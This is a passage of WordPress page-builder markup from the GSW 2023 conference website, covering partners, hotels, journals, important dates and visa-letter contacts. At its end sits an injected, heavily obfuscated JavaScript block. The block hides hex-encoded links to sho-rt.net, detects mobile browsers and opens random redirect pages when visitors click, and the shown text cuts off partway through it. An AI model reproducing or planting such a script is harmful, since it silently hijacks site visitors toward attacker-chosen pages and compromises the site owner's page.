Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 